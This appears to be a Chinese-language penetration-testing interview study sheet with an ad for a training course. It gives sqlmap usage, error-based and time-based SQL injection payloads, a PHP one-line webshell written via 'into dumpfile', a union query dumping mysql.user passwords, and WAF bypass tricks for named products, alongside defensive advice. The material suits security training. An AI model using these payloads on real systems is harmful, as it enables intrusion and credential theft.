給你一個網站你是如何來滲透測試的?

　　在獲取書面授權的前提下。

　　1

　　信息收集

　　1）獲取域名的whois信息,獲取注冊者郵箱姓名電話等。

　　2）查詢服務器旁站以及子域名站點，因為主站一般比較難，所以先看看旁站有沒有通用性的cms或者其他漏洞。

　　3）查看服務器操作系統版本，web中間件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞

　　4）查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。

　　5）掃描網站目錄結構，看看是否可以遍歷目錄，或者敏感文件泄漏，比如php探針

　　6）google hack 進一步探測網站的信息，后臺，敏感文件

　　2

　　漏洞掃描

　　開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

　　3

　　漏洞利用

　　利用以上的方式拿到webshell，或者其他權限

　　4

　　權限提升

　　提權服務器，比如windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，linux藏牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權

　　5

　　日志清理

　　6

　　總結報告及修復方案

　　sqlmap，怎么對一個注入點注入？

　　1.如果是get型號，直接，sqlmap -u "諸如點網址".

　　2. 如果是post型諸如點，可以sqlmap -u "注入點網址” --data="post的參數"

　　3.如果是cookie，X-Forwarded-For等，可以訪問的時候，用burpsuite抓包，注入處用*號替換，放到文件里，然后sqlmap -r "文件地址"

　　sql注入的幾種類型？

　　1.報錯注入

　　2.bool型注入

　　3.延時注入

　　4.寬字節注入

　　報錯注入的函數有哪些？

　　1.and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

　　2.通過floor報錯 向下取整

　　3.+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

　　4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

　　5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

　　6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

　　7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

　　8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

　　9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

　　10.exp()select * from test where id=1 and exp(~(select * from(select user())a));

　　延時注入如何來判斷？

　　if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)盲注和延時注入的共同點？

　　都是一個字符一個字符的判斷

　　如何拿一個網站的webshell？

　　上傳，后臺編輯模板，sql注入寫文件，命令執行，代碼執行。

　　一些已經爆出的cms漏洞，比如dedecms后臺可以直接建立腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等

　　sql注入寫文件都有哪些函數？

　　select '一句話' into outfile '路徑'

　　select '一句話' into dumpfile '路徑'

　　select '<?php eval($_POST[1]) ?>' into dumpfile 'd:wwwrootbaidu.comnvhack.php';

　　如何防止CSRF?

　　1.驗證referer

　　2.驗證token

　　詳細：https://cnodejs.org/topic/5533dd6e9138f09b629674fd

　　owasp 漏洞都有哪些？

　　1.SQL注入防護方法：

　　2.失效的身份認證和會話管理

　　3.跨站腳本攻擊XSS

　　4.直接引用不安全的對象

　　5.安全配置錯誤

　　6.敏感信息泄露

　　7.缺少功能級的訪問控制

　　8.跨站請求偽造CSRF

　　9.使用含有已知漏洞的組件

　　10.未驗證的重定向和轉發

　　SQL注入防護方法？

　　1.使用安全的API

　　2.對輸入的特殊字符進行Escape轉義處理

　　3.使用白名單來規范化輸入驗證方法

　　4.對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字符

　　5.服務器端在提交數據庫進行SQL查詢之前，對特殊字符進行過濾、轉義、替換、刪除。

　　代碼執行，文件讀取，命令執行的函數都有哪些？

　　1.代碼執行：eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

　　2.文件讀?。篺ile_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

　　3.命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

　　img標簽除了屬性外，還有其他獲取管理員路徑的辦法嗎？

　　src指定一個遠程的腳本文件，獲取referer

　　img標簽除了屬性外，并且src屬性的后綴名，必須以.jpg結尾，怎么獲取管理員路徑。

　　1.遠程服務器修改apache配置文件，配置.jpg文件以php方式來解析

　　AddType application/x-httpd-php .jpg

　　<img src=> 會以php方式來解析

　　代碼審計

　　eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

　　文件讀?。篺ile_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

　　命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

　　繞過walf

　　1.關鍵字可以用%（只限IIS系列）。比如select，可以sel%e%ct。原理：網絡層waf對SEL%E%CT進行url解碼后變成SEL%E%CT，匹配select失敗，而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll文件在對asp文件后參數串進行url解碼時，會直接過濾掉09-0d（09是tab鍵,0d是回車）、20（空格）、%(后兩個字符有一個不是十六進制)字符。xss也是同理。

　　2.通殺的，內聯注釋。安全狗不攔截，但是安全寶、加速樂、D盾等，看到/*!/就Fack了，所以只限于安全狗。比如：/*!select*/

　　3.編碼。這個方法對waf很有效果，因為一般waf會解碼，但是我們利用這個特點，進行兩次編碼，他解了第一次但不會解第二次，就bypass了。騰訊waf、百度waf等等都可以這樣bypass的。

　　4.繞過策略一：偽造搜索引擎

　　早些版本的安全狗是有這個漏洞的，就是把User-Agent修改為搜索引擎

　　5.360webscan腳本存在這個問題，就是判斷是否為admin dede install等目錄，如果是則不做攔截

　　1. GET /pen/news.php?id=1 union select user,password from mysql.user

　　1. GET /pen/news.php/admin?id=1 union select user,password from mysql.user

　　1. GET /pen/admin/..news.php?id=1 union select user,password from mysql.user

　　6.multipart請求繞過，在POST請求中添加一個上傳文件，繞過了絕大多數WAF。

　　7.參數繞過，復制參數，id=1&id=1

　　用一些特殊字符代替空格，比如在mysql中%0a是換行，可以代替空格，這個方法也可以部分繞過最新版本的安全狗，在sqlserver中可以用/**/代替空格

　　8.內聯注釋，

　　文件上傳，復制文件包一份再加一份

　　在 form-data;后面增加一定的字符

　　寬字符注入

　　寬字符：

　　解決方法：就是在初始化連接和字符集之后，使用SET character_set_client=binary來設定客戶端的字符集是二進制的。修改Windows下的MySQL配置文件一般是 my.ini，Linux下的MySQL配置文件一般是my.cnf，比如：mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL語句的編碼，如果設置為 binary，MySQL就以二進制來執行，這樣寬字節編碼問題就沒有用武之地了。

　　未

　　完

　　待

　　續

（作者：夏至冰雪）

煉石信息安全培訓春季班開招

QQ：495066536

372806985

敬請持續關注……